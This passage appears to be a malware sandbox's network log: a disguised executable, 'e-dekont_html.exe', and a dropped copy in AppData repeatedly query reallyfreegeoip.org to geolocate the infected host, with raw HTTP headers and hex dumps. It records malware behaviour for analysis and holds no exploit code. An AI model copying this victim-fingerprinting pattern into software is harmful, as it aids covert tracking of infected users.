                                                                                                                                                        2024-11-20 06:52:14 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.449739188.114.97.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:15 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:15 UTC844INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:15 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49444
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdpePzeRsR0T6myfP5mgrpeWvVjQVHZngqpAkQA7NIK5lDdKjfnB1mTVT9divdqjZfOHZbPkBhPovi6A15innHOYUZtadBnuds8TzotwRxztQWKRMspQwHCT1Nsbzpat3Co3EycG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e5684249dba8c57-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1775&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1548250&cwnd=203&unsent_bytes=0&cid=2f100f4569019160&ts=121&x=0"
                                                                                                                                                        2024-11-20 06:52:15 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.449742188.114.97.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:17 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:17 UTC856INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:17 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49446
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oA2vZrrjyQnAdqq6WO%2BQA5BZvBZqDkecCDi3iiXOJKwhdUjay%2BuzIud02h7w7eeYHDRTzhqz9SjGbMC2nUw%2FnAQrhsglJ5AjoPVpd%2BabD%2FAbh6XT3ANs%2FyvJ7h1ikwqoymXBiVua"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e56842f98221a24-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1909&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1502830&cwnd=209&unsent_bytes=0&cid=5fb64c546cd9c4af&ts=157&x=0"
                                                                                                                                                        2024-11-20 06:52:17 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.449744188.114.97.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:19 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:19 UTC848INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:19 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49448
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qvSPhPLoRIAT29qlHK42rqtAcphEF9qOjHDsLmdYK30Yamjiia%2FunpA4g1KcrxNjror4%2FOqfrxOYSDA8pvlmf31F1a1lyQgimzH6LhpdB7O6F3FftjDZa2KqObLZ63ompH8EJDGK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e56843c3e664379-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1719670&cwnd=194&unsent_bytes=0&cid=57c30b33908eb9d4&ts=610&x=0"
                                                                                                                                                        2024-11-20 06:52:19 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.449745188.114.97.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:19 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:19 UTC852INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:19 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49448
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2B2ApLr7uud4T9OGW8eP714NTRAPT4mOZ66rCmO7tsN382zDfyiQ4bO8vS9RHP8El7ySHaYH4AoPKnfJPwlgfhPi3PFQ%2B30gwMbX4Xl05u%2B4%2B71zwyyFBGytpcMJ3gzZEZ2IDF8P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e56843d9c36c33b-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1469&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1976980&cwnd=182&unsent_bytes=0&cid=085313ffa0f9954e&ts=118&x=0"
                                                                                                                                                        2024-11-20 06:52:19 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.449746188.114.97.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:19 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:20 UTC856INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:20 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49449
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hns5voylGasOli75ZX5yS%2FScxLMxhhwJ55e9SR2o2%2FZ3qLFcqj2j%2F%2FtgvudZ2k%2BRTvstgNJndL8h2xEbDSkJuKyUpnczDglezHEJ1YMaHK8N5hjJzl4bRBd7oh%2Ft4Fayw7dFXahw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e568441185e43b3-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2037&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1405197&cwnd=185&unsent_bytes=0&cid=52a82181443c5d58&ts=160&x=0"
                                                                                                                                                        2024-11-20 06:52:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.449748188.114.96.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:20 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:20 UTC850INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:20 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49449
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnMjZNSt%2Ba6642VMqyW7qbDBr7PnJVpHMhbi40wfBPaihzIEh1oXC1eHELbk%2BcxjaMDCFA9UyTja1hddZCkwpccudaI45rTYaxnklIupx4Xfwf0wQ%2FST1FE0myBC09x4L8HlBsLs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e5684448de28c05-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2036&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1409946&cwnd=211&unsent_bytes=0&cid=c74a4f1801bd1ad0&ts=139&x=0"
                                                                                                                                                        2024-11-20 06:52:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.449750188.114.96.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:21 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-11-20 06:52:21 UTC849INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:21 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49450
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvpxVCfQlsQBXs3X4qVWOjGmXyjDwM3bIt56g3%2F5VJ40Q%2Fpyn0vgC5Zn6JFiCEmLZwpF2r0FBzIFIkaqwqrj7U3XL2jMCfCQCxFy2Sk9JkKd51saXYQ5CfWeaEdONZk2hyIOLXmu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e5684489affc343-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10058&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1724748&cwnd=208&unsent_bytes=0&cid=41dbd44e6110845d&ts=194&x=0"
                                                                                                                                                        2024-11-20 06:52:21 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.449752188.114.96.34437308C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:21 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:21 UTC852INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:21 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49450
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJgt44fn9YXpQTFeCKYFr7iHFzkyBot1O%2Bygua57%2BNXjrXHRjGCBGheiZ8%2FObzGPokxg0NBCXaQi%2BJsBqq5s8HcFY0hIsdtN1d4sb8tP3Qkf5NCXk6RNMiE84Hc31ffu9qht4xom"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8e56844c5ada5e66-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1855146&cwnd=174&unsent_bytes=0&cid=7db87799810e647f&ts=159&x=0"
                                                                                                                                                        2024-11-20 06:52:21 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.449759188.114.96.34437696C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-20 06:52:23 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-11-20 06:52:23 UTC860INHTTP/1.1 200 OK
                                                                                                                                                        Date: Wed, 20 Nov 2024 06:52:23 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 361
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 49452
                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
